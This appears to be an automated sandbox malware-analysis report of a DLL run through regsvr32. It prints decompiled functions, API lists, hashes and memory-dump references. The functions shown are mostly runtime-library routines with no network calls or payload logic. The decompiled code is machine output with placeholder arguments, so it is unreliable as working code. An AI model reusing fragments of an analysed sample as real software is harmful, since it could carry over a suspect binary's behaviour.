                                                                              0x10017d2e
                                                                              0x10017d39
                                                                              0x10017d39
                                                                              0x10017d39
                                                                              0x10017d30
                                                                              0x10017d30
                                                                              0x10017d37
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10017d37
                                                                              0x10017d3b
                                                                              0x10017d3e
                                                                              0x00000000
                                                                              0x10017d3e
                                                                              0x10017d1a
                                                                              0x10017d1a
                                                                              0x10017d1d
                                                                              0x10017d44
                                                                              0x10017d44
                                                                              0x10017d47
                                                                              0x10017d47
                                                                              0x10017d4f
                                                                              0x10017d56
                                                                              0x10017d58
                                                                              0x10017d60
                                                                              0x10017d63
                                                                              0x10017d6b
                                                                              0x10017d73
                                                                              0x10017d7b
                                                                              0x10017d7b
                                                                              0x10017d86
                                                                              0x10017d8e
                                                                              0x10017d93
                                                                              0x10017ae5
                                                                              0x10017ae8
                                                                              0x10017af3
                                                                              0x10017afe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10017afe
                                                                              0x10017ae8
                                                                              0x10017db9

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: RectWindow$Parent$CopyEqualVisible
                                                                              • String ID: W
                                                                              • API String ID: 3103310903-655174618
                                                                              • Opcode ID: 8e16bc02764c1191157ca774e11536d2aa3ea59dfeb8fcbbf2e59cbd5da150b4
                                                                              • Instruction ID: 5d222a9da66156ec5447ced1a2b3b00dd2a15c5c53eb1adf3084992b0e1b58e3
                                                                              • Opcode Fuzzy Hash: 8e16bc02764c1191157ca774e11536d2aa3ea59dfeb8fcbbf2e59cbd5da150b4
                                                                              • Instruction Fuzzy Hash: 1981D17631868187EB29CB25E9457AEB7B1F789BC4F004115EF9A0BA58DF7CE485CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003E4F0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 143fileCOMMONLIBRARYCODECrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E1003E4F0(int __eax, void* __ecx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, long long __r12, void* __r13) {
				int _t28;
				void* _t29;
				long _t32;
				long _t34;
				long _t38;
				long _t40;
				long _t43;
				void* _t44;
				void* _t57;
				void* _t63;
				long _t68;
				void* _t71;
				void* _t85;
				long long _t94;
				void* _t96;
				void* _t99;
				void* _t100;
				void* _t109;
				void* _t115;

				_t115 = __r13;
				_t109 = __r9;
				_t100 = __r8;
				_t94 = __rsi;
				_t90 = __rdi;
				_t85 = __rdx;
				_t71 = __rcx;
				_t69 = __rbx;
				_t44 = __ecx;
				_t28 = __eax;
				 *((long long*)(_t99 + 0x50)) = __rbx;
				 *((long long*)(_t99 + 0x60)) = __rsi;
				 *((long long*)(_t99 + 0x68)) = __rdi;
				 *((long long*)(_t99 + 0x40)) = __r12;
				_t68 = 0x1006f780;
				_t63 = __ecx;
				_t43 = 0;
				while(_t44 !=  *_t68) {
					_t43 = _t43 + 1;
					_t68 = _t68 + 0x10;
					if(_t43 < 0x17) {
						continue;
					} else {
						L25:
						return _t28;
					}
				}
				__eflags = _t43 - 0x17;
				if(_t43 >= 0x17) {
					goto L25;
				}
				_t29 = E10048640(3, _t68, _t69, _t71, _t85, _t90, _t94, _t96, _t100);
				__eflags = _t29 - 1;
				if(_t29 == 1) {
					L22:
					_t28 = GetStdHandle();
					__eflags = _t68;
					if(_t68 != 0) {
						__eflags = _t68 - 0xffffffff;
						if(_t68 != 0xffffffff) {
							__eflags = _t43 + _t43;
							 *((long long*)(_t99 + 0x20)) = _t94;
							asm("repne scasb");
							_t28 = WriteFile(??, ??, ??, ??, ??);
						}
					}
					goto L25;
				}
				_t28 = E10048640(3, _t68, _t69, _t71, _t85, _t90, _t94, _t96, _t100);
				__eflags = _t28;
				if(_t28 != 0) {
					L8:
					__eflags = _t63 - 0xfc;
					if(_t63 != 0xfc) {
						_t87 = 0x10075489;
						r8d = 0x104;
						 *0x1007558d = sil;
						_t32 = GetModuleFileNameA(??, ??, ??);
						__eflags = _t32;
						if(_t32 == 0) {
							_t40 = E10047020(_t68, _t69, 0x10075489, 0x10075489, _t90, _t94, 0x10075470, "<program name unknown>");
							__eflags = _t40;
							if(_t40 != 0) {
								r9d = 0;
								r8d = 0;
								__eflags = 0;
								 *((long long*)(_t99 + 0x20)) = _t94;
								E1003C6F0(0, 0x10075489, "<program name unknown>");
							}
						}
						asm("repne scasb");
						__eflags = 0xffffffff - 0x3c;
						if(0xffffffff > 0x3c) {
							_t10 = _t68 + 3; // 0x3
							r9d = _t10;
							_t87 = 0x10075785;
							_t38 = E10048520(_t68, _t69, 0x10c22ffa, 0x10075785, 0x10075489, _t94, 0x10075470, "...", _t109);
							__eflags = _t38;
							if(_t38 != 0) {
								r9d = 0;
								r8d = 0;
								__eflags = 0;
								 *((long long*)(_t99 + 0x20)) = _t94;
								E1003C6F0(0, 0x10075785, "...");
							}
						}
						_t103 = "\n\n";
						_t34 = E10048460(_t68, _t69, 0x10075470, _t87, 0x10075489, _t94, 0x10075470, "\n\n");
						__eflags = _t34;
						if(_t34 != 0) {
							r9d = 0;
							r8d = 0;
							__eflags = 0;
							 *((long long*)(_t99 + 0x20)) = _t94;
							E1003C6F0(0, _t87, _t103);
						}
						_t57 = 0x314;
						_t106 =  *((intOrPtr*)(0x1006f780 + 8 + (_t43 + _t43) * 8));
						__eflags = E10048460(_t68, _t69, 0x10075470, _t87, 0x10075489, _t94, 0x10075470,  *((intOrPtr*)(0x1006f780 + 8 + (_t43 + _t43) * 8)));
						if(__eflags != 0) {
							r9d = 0;
							r8d = 0;
							_t57 = 0;
							__eflags = 0;
							 *((long long*)(_t99 + 0x20)) = _t94;
							E1003C6F0(0, _t87, _t106);
						}
						r8d = 0x12010;
						_t28 = E10048220(_t57, __eflags, _t69, 0x10075470, "Microsoft Visual C++ Runtime Library", 0x10075489, _t94, 0x10075470, _t106, _t109, 0x1006f780, _t115);
					}
					goto L25;
				}
				__eflags =  *0x10074d40 - 1;
				if( *0x10074d40 == 1) {
					goto L22;
				}
				goto L8;
			}






















                                                                              0x1003e4f0
                                                                              0x1003e4f0
                                                                              0x1003e4f0
                                                                              0x1003e4f0
                                                                              0x1003e4f0
                                                                              0x1003e4f0
                                                                              0x1003e4f0
                                                                              0x1003e4f0
                                                                              0x1003e4f0
                                                                              0x1003e4f0
                                                                              0x1003e4f4
                                                                              0x1003e4f9
                                                                              0x1003e4fe
                                                                              0x1003e503
                                                                              0x1003e511
                                                                              0x1003e514
                                                                              0x1003e516
                                                                              0x1003e518
                                                                              0x1003e51c
                                                                              0x1003e51f
                                                                              0x1003e526
                                                                              0x00000000
                                                                              0x1003e528
                                                                              0x1003e70e
                                                                              0x1003e726
                                                                              0x1003e726
                                                                              0x1003e526
                                                                              0x1003e52d
                                                                              0x1003e530
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003e53b
                                                                              0x1003e540
                                                                              0x1003e543
                                                                              0x1003e6c2
                                                                              0x1003e6c7
                                                                              0x1003e6cd
                                                                              0x1003e6d3
                                                                              0x1003e6d5
                                                                              0x1003e6d9
                                                                              0x1003e6e5
                                                                              0x1003e6e8
                                                                              0x1003e6fc
                                                                              0x1003e708
                                                                              0x1003e708
                                                                              0x1003e6d9
                                                                              0x00000000
                                                                              0x1003e6d3
                                                                              0x1003e54e
                                                                              0x1003e553
                                                                              0x1003e555
                                                                              0x1003e564
                                                                              0x1003e564
                                                                              0x1003e56a
                                                                              0x1003e5a8
                                                                              0x1003e5af
                                                                              0x1003e5b7
                                                                              0x1003e5be
                                                                              0x1003e5c4
                                                                              0x1003e5c6
                                                                              0x1003e5db
                                                                              0x1003e5e0
                                                                              0x1003e5e2
                                                                              0x1003e5e4
                                                                              0x1003e5e7
                                                                              0x1003e5ec
                                                                              0x1003e5ee
                                                                              0x1003e5f3
                                                                              0x1003e5f3
                                                                              0x1003e5e2
                                                                              0x1003e608
                                                                              0x1003e60d
                                                                              0x1003e611
                                                                              0x1003e61f
                                                                              0x1003e61f
                                                                              0x1003e62a
                                                                              0x1003e62d
                                                                              0x1003e632
                                                                              0x1003e634
                                                                              0x1003e636
                                                                              0x1003e639
                                                                              0x1003e63e
                                                                              0x1003e640
                                                                              0x1003e645
                                                                              0x1003e645
                                                                              0x1003e634
                                                                              0x1003e64a
                                                                              0x1003e659
                                                                              0x1003e65e
                                                                              0x1003e660
                                                                              0x1003e662
                                                                              0x1003e665
                                                                              0x1003e66a
                                                                              0x1003e66c
                                                                              0x1003e671
                                                                              0x1003e671
                                                                              0x1003e679
                                                                              0x1003e684
                                                                              0x1003e68e
                                                                              0x1003e690
                                                                              0x1003e692
                                                                              0x1003e695
                                                                              0x1003e698
                                                                              0x1003e69a
                                                                              0x1003e69c
                                                                              0x1003e6a1
                                                                              0x1003e6a1
                                                                              0x1003e6ad
                                                                              0x1003e6b6
                                                                              0x1003e6bb
                                                                              0x00000000
                                                                              0x1003e56a
                                                                              0x1003e557
                                                                              0x1003e55e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(?,?,?,?,?,?,?,?,1003E80F,?,?,?,?,?,?,10039591), ref: 1003E5BE
                                                                              • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,1003E80F,?,?,?,?,?,?,10039591), ref: 1003E6C7
                                                                              • WriteFile.KERNEL32 ref: 1003E708
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandleModuleNameWrite
                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                              • API String ID: 3784150691-4022980321
                                                                              • Opcode ID: 95719df4c0de6943b3efa30f6ebbd0f252b78f66381eb7f8eeba6c3c721755c6
                                                                              • Instruction ID: a597a83b15f63dea02bc3964510337b95f08ac2f1ca49a2518155eb0156362f3
                                                                              • Opcode Fuzzy Hash: 95719df4c0de6943b3efa30f6ebbd0f252b78f66381eb7f8eeba6c3c721755c6
                                                                              • Instruction Fuzzy Hash: FE513935314BC04AEB22DB25B81179E3351F7887D5F500326EEA98BAD0DF78D942C704
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10038D20 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlCaptureContext.KERNEL32 ref: 1003C5A3
                                                                              • RtlLookupFunctionEntry.KERNEL32 ref: 1003C5C2
                                                                              • RtlVirtualUnwind.KERNEL32 ref: 1003C60E
                                                                              • IsDebuggerPresent.KERNEL32 ref: 1003C680
                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 1003C698
                                                                              • UnhandledExceptionFilter.KERNEL32 ref: 1003C6A5
                                                                              • GetCurrentProcess.KERNEL32 ref: 1003C6BE
                                                                              • TerminateProcess.KERNEL32 ref: 1003C6CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                              • String ID:
                                                                              • API String ID: 3778485334-0
                                                                              • Opcode ID: 6d23f1b5b5f85dde844f52fdc752ae7ae82c04d23e02299ada0cbe2e84374b9e
                                                                              • Instruction ID: 3125739899cbd262df70be1a159e84a0f0c21f2e86920ae001a14fecf358cd63
                                                                              • Opcode Fuzzy Hash: 6d23f1b5b5f85dde844f52fdc752ae7ae82c04d23e02299ada0cbe2e84374b9e
                                                                              • Instruction Fuzzy Hash: 0E31E635205B84C5EB12DB55F84439AB3A0F788799F920526EACD47B64DFBDD4E8CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180019AF0 Relevance: 10.7, Strings: 8, Instructions: 710COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !f3$/w 8$CZ&B$KE$XW]${H$~V$ehl
                                                                              • API String ID: 0-603092622
                                                                              • Opcode ID: 1ed8f1f3fe5d83a620da9bed02dcbbab86e8a919e24c18f8a00020719e4cb4ac
                                                                              • Instruction ID: cfa183faa2580dac9c87674e45a13d453ed6874265d0529349a04ca9f57a85af
                                                                              • Opcode Fuzzy Hash: 1ed8f1f3fe5d83a620da9bed02dcbbab86e8a919e24c18f8a00020719e4cb4ac
                                                                              • Instruction Fuzzy Hash: 079206752047888BDBB8CF24D8897CE7BE1FB86354F10451DE94E8AA60DBB89744CF42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003036C Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 19%
                                                                              			E1003036C(void* __rcx, void* __rdx, void* __r8) {
				signed int _v56;
				char _v604;
				void* _v648;
				long long _v664;
				char _v672;
				void* _v680;
				char _v688;
				signed char _v696;
				signed int _v704;
				long long _v712;
				void* _v720;
				long long _v728;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				long _t44;
				signed int _t47;
				signed int _t53;
				signed char _t54;
				int _t61;
				signed int _t67;
				void* _t79;
				signed long long _t104;
				signed long long _t105;
				void* _t106;
				long long _t110;
				void* _t114;
				intOrPtr _t115;
				void* _t116;
				void* _t117;
				void* _t136;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr* _t144;
				intOrPtr* _t147;
				void* _t150;
				void* _t151;
				void* _t152;
				void* _t155;
				signed long long _t160;
				signed int _t161;
				void* _t162;

				_t136 = __rdx;
				_t116 = __rcx;
				_t153 =  &_v720;
				_v664 = 0xfffffffe;
				_t104 =  *0x1006f4c8; // 0x6f13091946cb
				_t105 = _t104 ^  &_v720;
				_v56 = _t105;
				_t162 = __r8;
				_t150 = __rdx;
				_t152 = __rcx;
				if((0 | __rcx != 0x00000000) == 0) {
					E10016544();
					asm("int3");
				}
				if((0 | _t136 != 0x00000000) == 0) {
					E10016544();
					asm("int3");
				}
				_t158 =  &_v680;
				_t155 = _t116;
				_t117 = _t150;
				_t44 = GetFullPathNameW(??, ??, ??, ??);
				if(_t44 != 0) {
					__eflags = _t44 - 0x104;
					if(_t44 < 0x104) {
						E10029130(_t44);
						_t160 = _t105;
						__eflags = _t105;
						_t87 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							_t87 = 0x80004005;
							E10009538(0x80004005, 0x104, _t105, _t114, _t117, _t136, _t150, _t155,  &_v680, _t160);
							asm("int3");
						}
						_t106 =  *_t105;
						 *((intOrPtr*)(_t106 + 0x18))();
						_v688 = _t106 + 0x18;
						_t47 = E1003004C(_t152,  &_v688, _t150, _t151, _t152);
						_t115 = _v688;
						__imp__PathIsUNCW();
						__eflags = _t47;
						if(_t47 != 0) {
							L44:
							_t138 = _t115 - 0x18;
							asm("lock xadd [edx+0x10], eax");
							__eflags = 0x1fffffffe;
							if(0x1fffffffe <= 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t138)) + 8))();
							}
						} else {
							_v704 = _t47;
							_v712 = 0;
							_v720 =  &_v696;
							_t110 =  &_v672;
							_v728 = _t110;
							r9d = 0;
							r8d = 0;
							_t53 = GetVolumeInformationW(??, ??, ??, ??, ??, ??, ??, ??);
							__eflags = _t53;
							if(_t53 != 0) {
								_t54 = _v696;
								__eflags = _t54 & 0x00000002;
								if((_t54 & 0x00000002) == 0) {
									CharUpperW();
									_t54 = _v696;
								}
								__eflags = _t54 & 0x00000004;
								if((_t54 & 0x00000004) != 0) {
									goto L44;
								} else {
									FindFirstFileW();
									__eflags = _t110 - 0xffffffff;
									if(_t110 == 0xffffffff) {
										goto L44;
									} else {
										FindClose();
										_t161 = _v680;
										__eflags = _t161;
										if(_t161 == 0) {
											L41:
											_t140 = _t115 - 0x18;
											asm("lock xadd [edx+0x10], eax");
											__eflags = 0x1fffffffe;
											if(0x1fffffffe <= 0) {
												 *((intOrPtr*)( *((intOrPtr*)( *_t140)) + 8))();
											}
										} else {
											__eflags = _t161 - _t152;
											if(_t161 <= _t152) {
												goto L41;
											} else {
												_t61 = lstrlenW();
												_t129 = _v680;
												__eflags = _t61 - 0x104;
												if(_t61 >= 0x104) {
													L38:
													_t144 = _t115 - 0x18;
													asm("lock xadd [edx+0x10], eax");
													__eflags = 0x1fffffffe;
													if(0x1fffffffe <= 0) {
														 *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 8))();
													}
												} else {
													_t67 = E1003B730(_t110, _t115, _t129, 0x104, _t150, _t151, _t152,  &_v604);
													__eflags = _t67;
													if(_t67 == 0) {
														goto L44;
													} else {
														__eflags = _t67 - 0xc;
														if(_t67 == 0xc) {
															L37:
															E100164FC();
															goto L38;
														} else {
															__eflags = _t67 - 0x16;
															if(_t67 == 0x16) {
																L36:
																E10016544();
																asm("int3");
																goto L37;
															} else {
																__eflags = _t67 - 0x22;
																if(_t67 == 0x22) {
																	goto L36;
																} else {
																	__eflags = _t67 - 0x50;
																	if(_t67 == 0x50) {
																		goto L44;
																	} else {
																		E10016544();
																		asm("int3");
																		goto L36;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							} else {
								E1003031C(0x104, _t110, _t162, _t150, _t155, _t158, _t162);
								_t147 = _t115 - 0x18;
								asm("lock xadd [edx+0x10], eax");
								__eflags = 0x1fffffffe;
								if(0x1fffffffe <= 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t147)) + 8))();
								}
							}
						}
					} else {
					}
				} else {
					_t157 = _t150;
					_t79 = E10038D40(_t105, _t152, _t151, _t150, 0xffffffff);
					if(_t79 != 0) {
						if(_t79 == 0xc) {
							L12:
							E100164FC();
							asm("int3");
						} else {
							if(_t79 == 0x16 || _t79 == 0x22) {
								L11:
								E10016544();
								asm("int3");
								goto L12;
							} else {
								if(_t79 != 0x50) {
									E10016544();
									asm("int3");
									goto L11;
								}
							}
						}
					}
					E1003031C(0x104, _t105, _t162, _t150, _t157, 0xffffffff, _t162);
				}
				return E10038D20(_t87, _v56 ^ _t153);
			}















































                                                                              0x1003036c
                                                                              0x1003036c
                                                                              0x10030373
                                                                              0x1003037a
                                                                              0x10030383
                                                                              0x1003038a
                                                                              0x1003038d
                                                                              0x10030395
                                                                              0x10030398
                                                                              0x1003039b
                                                                              0x100303a8
                                                                              0x100303aa
                                                                              0x100303af
                                                                              0x100303af
                                                                              0x100303ba
                                                                              0x100303bc
                                                                              0x100303c1
                                                                              0x100303c1
                                                                              0x100303c2
                                                                              0x100303c7
                                                                              0x100303d1
                                                                              0x100303d4
                                                                              0x100303dc
                                                                              0x1003042f
                                                                              0x10030431
                                                                              0x1003043a
                                                                              0x1003043f
                                                                              0x10030444
                                                                              0x10030447
                                                                              0x1003044c
                                                                              0x1003044e
                                                                              0x10030453
                                                                              0x10030458
                                                                              0x10030458
                                                                              0x10030459
                                                                              0x1003045f
                                                                              0x10030466
                                                                              0x10030473
                                                                              0x10030478
                                                                              0x10030480
                                                                              0x10030486
                                                                              0x10030488
                                                                              0x100305ec
                                                                              0x100305ec
                                                                              0x100305f5
                                                                              0x100305fd
                                                                              0x100305ff
                                                                              0x10030607
                                                                              0x10030607
                                                                              0x1003048e
                                                                              0x1003048e
                                                                              0x10030492
                                                                              0x100304a0
                                                                              0x100304a5
                                                                              0x100304aa
                                                                              0x100304af
                                                                              0x100304b2
                                                                              0x100304ba
                                                                              0x100304c0
                                                                              0x100304c2
                                                                              0x100304f5
                                                                              0x100304f9
                                                                              0x100304fb
                                                                              0x10030500
                                                                              0x10030506
                                                                              0x10030506
                                                                              0x1003050a
                                                                              0x1003050c
                                                                              0x00000000
                                                                              0x10030512
                                                                              0x1003051a
                                                                              0x10030520
                                                                              0x10030524
                                                                              0x00000000
                                                                              0x1003052a
                                                                              0x1003052d
                                                                              0x10030533
                                                                              0x10030538
                                                                              0x1003053b
                                                                              0x100305ca
                                                                              0x100305ca
                                                                              0x100305d3
                                                                              0x100305db
                                                                              0x100305dd
                                                                              0x100305e5
                                                                              0x100305e5
                                                                              0x10030541
                                                                              0x10030541
                                                                              0x10030544
                                                                              0x00000000
                                                                              0x1003054a
                                                                              0x10030552
                                                                              0x10030558
                                                                              0x10030568
                                                                              0x1003056a
                                                                              0x100305a8
                                                                              0x100305a8
                                                                              0x100305b1
                                                                              0x100305b9
                                                                              0x100305bb
                                                                              0x100305c3
                                                                              0x100305c3
                                                                              0x1003056c
                                                                              0x10030579
                                                                              0x1003057e
                                                                              0x10030580
                                                                              0x00000000
                                                                              0x10030582
                                                                              0x10030582
                                                                              0x10030585
                                                                              0x100305a2
                                                                              0x100305a2
                                                                              0x00000000
                                                                              0x10030587
                                                                              0x10030587
                                                                              0x1003058a
                                                                              0x1003059c
                                                                              0x1003059c
                                                                              0x100305a1
                                                                              0x00000000
                                                                              0x1003058c
                                                                              0x1003058c
                                                                              0x1003058f
                                                                              0x00000000
                                                                              0x10030591
                                                                              0x10030591
                                                                              0x10030594
                                                                              0x00000000
                                                                              0x10030596
                                                                              0x10030596
                                                                              0x1003059b
                                                                              0x00000000
                                                                              0x1003059b
                                                                              0x10030594
                                                                              0x1003058f
                                                                              0x1003058a
                                                                              0x10030585
                                                                              0x10030580
                                                                              0x1003056a
                                                                              0x10030544
                                                                              0x1003053b
                                                                              0x10030524
                                                                              0x100304c4
                                                                              0x100304ca
                                                                              0x100304d0
                                                                              0x100304d9
                                                                              0x100304e1
                                                                              0x100304e3
                                                                              0x100304eb
                                                                              0x100304eb
                                                                              0x100304ee
                                                                              0x100304c2
                                                                              0x10030433
                                                                              0x10030433
                                                                              0x100303de
                                                                              0x100303e5
                                                                              0x100303ee
                                                                              0x100303f5
                                                                              0x100303fa
                                                                              0x10030417
                                                                              0x10030417
                                                                              0x1003041c
                                                                              0x100303fc
                                                                              0x100303ff
                                                                              0x10030411
                                                                              0x10030411
                                                                              0x10030416
                                                                              0x00000000
                                                                              0x10030406
                                                                              0x10030409
                                                                              0x1003040b
                                                                              0x10030410
                                                                              0x00000000
                                                                              0x10030410
                                                                              0x10030409
                                                                              0x100303ff
                                                                              0x100303fa
                                                                              0x10030423
                                                                              0x10030428
                                                                              0x1003062c

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Path$FullInformationNameVolume
                                                                              • String ID:
                                                                              • API String ID: 995784377-0
                                                                              • Opcode ID: 0ab5116b883edbbd049a53408ebc67e611735b417d759103e971dbbbe15745c8
                                                                              • Instruction ID: 6589108e2c9c619776c05a01a4cdcf4026d84a81d9e872d9b748f85aba8fa156
                                                                              • Opcode Fuzzy Hash: 0ab5116b883edbbd049a53408ebc67e611735b417d759103e971dbbbe15745c8
                                                                              • Instruction Fuzzy Hash: 7461E571702E418ADB06CB39DC6535E2395EB89BF5F114621FF698B7E4EF68C981CA00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100111A4 Relevance: 10.6, APIs: 7, Instructions: 121windowCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 31%
                                                                              			E100111A4(void* __ebx, signed int __edx, intOrPtr __rax, intOrPtr* __rcx, void* __rdx, void* __r8, intOrPtr __r9, void* __r11) {
				intOrPtr _v88;
				void* _t38;
				void* _t47;
				void* _t48;
				signed int _t50;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				void* _t70;
				void* _t71;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;

				_t73 = __r11;
				_t72 = __r9;
				_t71 = __r8;
				_t70 = __rdx;
				_t61 = __rax;
				_t38 = __ebx;
				r15d = 1;
				r12d = 0;
				_t50 = __edx & 0x00000004;
				_t62 = __rcx;
				_t48 = r15d;
				if(_t50 == 0) {
					L3:
					_t47 = 0;
					L4:
					_t64 =  *((intOrPtr*)(_t62 + 0x40));
					GetParent(??);
					 *(_t62 + 0x78) =  *(_t62 + 0x78) | 0x00000018;
					_t75 = _t61;
					E10023E54(_t61);
					_t74 = _t61;
					L15:
					while(1) {
						L15:
						while(_t48 != 0) {
							r9d = 0;
							r8d = 0;
							_t64 = _t74;
							_v88 = 0;
							if(PeekMessageW(??, ??, ??, ??, ??) != 0) {
								L16:
								while(E100243D8(_t48, _t61, _t64, _t70, _t71, _t72, _t73) != 0) {
									if(_t47 != 0 && ( *((intOrPtr*)(_t74 + 8)) == 0x118 ||  *((intOrPtr*)(_t74 + 8)) == 0x104)) {
										E10016154(_t62);
										UpdateWindow(??);
										_t47 = 0;
									}
									_t61 =  *_t62;
									if( *((intOrPtr*)(_t61 + 0x100))() == 0) {
										 *(_t62 + 0x78) =  *(_t62 + 0x78) & 0xffffffe7;
										return  *((intOrPtr*)(_t62 + 0x88));
									} else {
										if(E1002427C(_t38, _t48, _t61, _t74, _t70, _t71, _t72) != 0) {
											_t48 = r15d;
											r12d = 0;
										}
										r9d = 0;
										r8d = 0;
										_t64 = _t74;
										_v88 = 0;
										if(PeekMessageW(??, ??, ??, ??, ??) != 0) {
											continue;
										} else {
											goto L15;
										}
									}
								}
								E10024D14();
								return 0xffffffff;
							}
							if(_t47 != 0) {
								E10016154(_t62);
								_t64 =  *((intOrPtr*)(_t62 + 0x40));
								UpdateWindow(??);
								_t47 = 0;
							}
							if((r15b & bpl) == 0 && _t75 != 0 && r12d == 0) {
								_t72 =  *((intOrPtr*)(_t62 + 0x40));
								r8d = 0;
								_t64 = _t75;
								SendMessageW(??, ??, ??, ??);
							}
							if((bpl & 0x00000002) != 0) {
								L14:
								_t48 = 0;
								continue;
							} else {
								_t64 =  *((intOrPtr*)(_t62 + 0x40));
								_t72 = r12d;
								r8d = 0;
								SendMessageW(??, ??, ??, ??);
